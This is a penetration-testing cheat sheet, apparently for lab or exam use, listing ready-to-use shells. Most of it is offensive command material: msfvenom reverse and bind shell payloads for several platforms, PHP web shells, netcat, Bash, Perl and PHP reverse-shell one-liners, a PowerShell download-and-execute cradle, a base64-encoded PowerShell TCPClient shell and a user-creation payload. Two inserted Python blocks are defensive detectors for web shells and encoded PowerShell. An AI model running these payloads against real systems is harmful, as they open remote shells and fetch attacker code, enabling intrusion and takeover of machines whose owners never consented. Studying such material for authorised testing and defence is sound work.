# Shells

## Listener

```bash
rlwrap -cAr nc -lnvp <Port Number>
```

## Web Shells

> Locate and upload appropriate shells from /usr/share/webshells

***

## Reverse Shells

> Refer to [https://www.revshells.com/](https://www.revshells.com/)

***

## Reverse Shells (MSFvenom)

> **NOTE:**
>
> * **`shell/reverse_tcp` (slash) = staged payload**
> * **`shell_reverse_tcp` (underscore) = unstaged payload**
> * **a staged payload needs a Metasploit handler (`exploit/multi/handler`) to deliver its second stage; a plain `nc` listener only works with unstaged `shell_*` payloads**

<details>

<summary>Formats</summary>

```
Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    masm
    nim
    nimlang
    num
    octal
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript
    zig
```

</details>

### Linux

<details>

<summary>Reverse Shell</summary>

* 32-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

* 64-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

</details>

<details>

<summary>Bind Shell</summary>

* 32-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x86/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x86/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

* 64-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p linux/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

</details>

### Windows

<details>

<summary>Reverse Shell</summary>

* 32-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

* 64-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
```

{% endcode %}

</details>

<details>

<summary>Bind Shell</summary>

* 32-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

* 64-bit Systems

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
```

{% endcode %}

</details>

<details>

<summary>Extras</summary>

* Run command via executable file

{% code overflow="wrap" %}

```bash
msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<Powershell | CMD Command>" -f exe > payload.exe
```

{% endcode %}

> **EXAMPLE:**
>
> ```bash
> msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX(New-Object Net.WebClient).DownloadString('http:///')" -f exe > payload.exe
> ```

* Create User via executable file

{% code overflow="wrap" %}

```bash
msfvenom -p windows/adduser USER=<Username> PASS=<Password> -f exe > adduser.exe
```

{% endcode %}

</details>

### SunOS (Solaris)

{% code overflow="wrap" %}

```bash
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
```

{% endcode %}

***

## Web-based Payloads

### PHP

<details>

<summary>Web Shell</summary>

```php
<?php system($_GET['cmd']); ?>
```

```php
<?php system($_REQUEST['cmd']); ?>
```

</details>

<details>

<summary>Reverse Shell</summary>

```php
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
```

{% code overflow="wrap" %}

```bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > shell.php
# msfvenom leaves the opening tag commented out (/*<?php /**/); prepend a live one
sed -i '1s/^/<?php /' shell.php
```

{% endcode %}

</details>
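The two PHP snippets above, a `system()` call fed by a request parameter and a `system()` call that launches `nc.exe -e`, are exactly the shapes a defender looks for when reviewing a web root or upload directory. The scanner below is an added example and not part of the original cheat sheet: the rule names, the `scan_php` and `scan_upload_dir` helpers and the sample file contents are constructed for illustration (the address is from the 192.0.2.0/24 documentation range), and the patterns are taken from the snippets on this page.

```python
import re
from typing import Dict, List

# Constructed rule names; each pattern is the shape of a snippet on this page:
# a shell that feeds a request parameter to system(), a reverse shell that
# opens a socket with fsockopen(), and a netcat launched with -e/-c.
WEBSHELL_RULES = {
    "exec_of_request_param": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST)\b", re.I),
    "socket_to_shell": re.compile(r"\bfsockopen\s*\(", re.I),
    "netcat_exec": re.compile(r"\bnc(?:64)?(?:\.exe)?\b[^;\n]*\s-[ce]\s", re.I),
}


def scan_php(source: str) -> List[str]:
    """Return the names of the rules that match a PHP source string."""
    return [name for name, rx in WEBSHELL_RULES.items() if rx.search(source)]


def scan_upload_dir(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a {path: contents} mapping and report only the files that hit a rule."""
    report: Dict[str, List[str]] = {}
    for path, body in files.items():
        hits = scan_php(body)
        if hits:
            report[path] = hits
    return report


# Constructed sample upload directory (strings, not real files). Three bodies
# mirror the snippets on this page with a documentation-range address; the
# fourth is a benign script that also reads $_GET, to show what does not fire.
SAMPLE_UPLOADS = {
    "uploads/cmd.php": "<?php system($_GET['cmd']); ?>",
    "uploads/req.php": "<?php system($_REQUEST['cmd']); ?>",
    "uploads/rev.php": "<?php system('nc.exe -e cmd.exe 192.0.2.10 4444') ?>",
    "uploads/avatar.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
}

if __name__ == "__main__":
    for path, rules in scan_upload_dir(SAMPLE_UPLOADS).items():
        print(f"{path}: {', '.join(rules)}")
```

The benign `avatar.php` reads `$_GET` too but never hands it to an execution function, so it is not reported; a rule that fired on `$_GET` alone would flood a review with false positives.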

### ASP[X]

<details>

<summary>Web Shell</summary>

> Get from the following
>
> * /usr/share/webshells/aspx/cmdasp.aspx
> * /usr/share/webshells/aspx/shell.aspx
>
> **NOTE: Remember to modify the `string host` and `int port` variables in shell.aspx**

</details>

<details>

<summary>Reverse Shell</summary>

{% code overflow="wrap" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f asp > reverse.asp
```

{% endcode %}

{% code overflow="wrap" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f aspx > reverse.aspx
```

{% endcode %}

</details>

### JSP

{% code overflow="wrap" %}

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.jsp
```

{% endcode %}

### WAR

{% code overflow="wrap" %}

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war
```

{% endcode %}

### NodeJS

```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>
```

***

## Script Language Payloads

### Evil-WinRM

> **NOTE:**
>
> * **Verify usability with: `crackmapexec winrm <Target IP Address>`**
> * **Look for port 5985 in nmap scans**

```bash
evil-winrm -i <Target IP Address> -u <Username> -p <Password>
```

```bash
evil-winrm -i <Target IP Address> -u <Username> -H <NTLM Hash>
```

### Powercat.ps1

{% code overflow="wrap" %}

```powershell
powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')
```

{% endcode %}

```powershell
powercat -c <Kali IP Address> -p <Kali Port> -e powershell
```

### Perl

{% code overflow="wrap" %}

```bash
msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl
```

{% endcode %}

{% code overflow="wrap" %}

```bash
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

{% endcode %}

### Python

{% code overflow="wrap" %}

```bash
msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py
```

{% endcode %}

### PHP

```php
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
```

{% code overflow="wrap" %}

```bash
php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```

{% endcode %}

### Bash

> **NOTE: Create a .sh file and paste the following**
>
> ```bash
> #!/bin/bash
> /bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"
> ```

### Netcat

* Linux

```bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/bash
```

```bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/sh
```

```bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/bash
```

```bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/sh
```

* Windows

```sh
nc64.exe <Kali IP Address> <Kali Port> -e cmd
```

```sh
nc64.exe <Kali IP Address> <Kali Port> -e powershell
```

```sh
nc64.exe <Kali IP Address> <Kali Port> -t -e cmd
```

```sh
nc64.exe <Kali IP Address> <Kali Port> -t -e powershell
```

### PowerShell

> Do the following in Kali's *pwsh*

{% code overflow="wrap" %}

```powershell
$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
```

{% endcode %}

> Create the following Python script and run it

{% code overflow="wrap" %}

```python
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)
```

{% endcode %}
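Both encoding snippets above build the `-e` argument the same way: the script is taken as UTF-16LE (`[Text.Encoding]::Unicode`, or `encode('utf16')[2:]` with the BOM dropped) and then Base64-encoded. That is why an analyst who finds `powershell -nop -w hidden -e ...` in a process-creation log can recover the script by reversing the two steps. The Python below is an added example, not code from the original cheat sheet: `encode_powershell` performs the page's encoding, `decode_encoded_command` reverses it from a logged command line, and `triage` flags the switches and .NET classes used by the PowerShell and Powercat one-liners on this page. The indicator names, helper names and the sample command lines (with a 192.0.2.x documentation address) are constructed.

```python
import base64
import re
from typing import Dict, List, Optional


def encode_powershell(script: str) -> str:
    """UTF-16LE then Base64: the same transformation the page applies with
    [Text.Encoding]::Unicode and base64.b64encode(payload.encode('utf16')[2:])."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
_ENC_FLAG = re.compile(r"^-(?:e|ec|enc|encodedcommand)$", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -e/-enc/-EncodedCommand in a logged command
    line, or None when there is no such flag or its value is not valid
    Base64-wrapped UTF-16LE."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _ENC_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


# Constructed indicator names; the patterns are the switches and .NET classes
# used by the PowerShell reverse shell and the Powercat cradle on this page.
INDICATORS = {
    "no_profile": re.compile(r"(?:^|\s)-nop\b", re.I),
    "hidden_window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I),
    "tcp_client_in_script": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "download_cradle": re.compile(r"DownloadString\s*\(", re.I),
}


def triage(cmdline: str) -> Dict[str, object]:
    """Decode any encoded command, then match the indicators against both the
    visible command line and the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    flags: List[str] = ["encoded_command"] if decoded is not None else []
    flags.extend(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"decoded": decoded, "indicators": flags}


# Constructed samples (not captured data): a shortened form of the page's
# TCPClient script, encoded as the page does, and the Powercat download cradle.
SAMPLE_SCRIPT = '$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10", 4444);$stream = $client.GetStream()'
SAMPLE_CMDLINES = [
    "powershell -nop -w hidden -e " + encode_powershell(SAMPLE_SCRIPT),
    "powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/powercat.ps1')",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(result["indicators"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Because the indicators are matched against the decoded text as well as the raw command line, the `TCPClient` reference is found even though it never appears in the logged line itself; matching only the visible command line would leave an encoded payload opaque.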

## TTY Shell

> **NOTE: Sometimes the reverse shell we get is not fully functional (no job control, no tab completion, programs that need a terminal fail). The following commands spawn a proper TTY shell.**

### Python

```bash
python -c 'import pty; pty.spawn("/bin/sh")'
```

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
```

### Bash

```bash
# for a shell whose input is evaluated by a Python interpreter
echo os.system('/bin/bash')
```

```bash
/bin/sh -i
```

```bash
/bin/bash -i
```

```bash
script -qc /bin/bash /dev/null
```

### Perl

```perl
perl -e 'exec "/bin/sh";'
```

```perl
exec "/bin/sh";
```

### Ruby

```ruby
exec "/bin/sh"
```

### Lua

```lua
os.execute('/bin/sh')
```

### IRB

```ruby
exec "/bin/sh"
```

### Vi

```vim
:!bash
```

```vim
:set shell=/bin/bash
:shell
```

### Nmap

```bash
# at the prompt of nmap's interactive mode (nmap --interactive, older releases only)
!sh
```

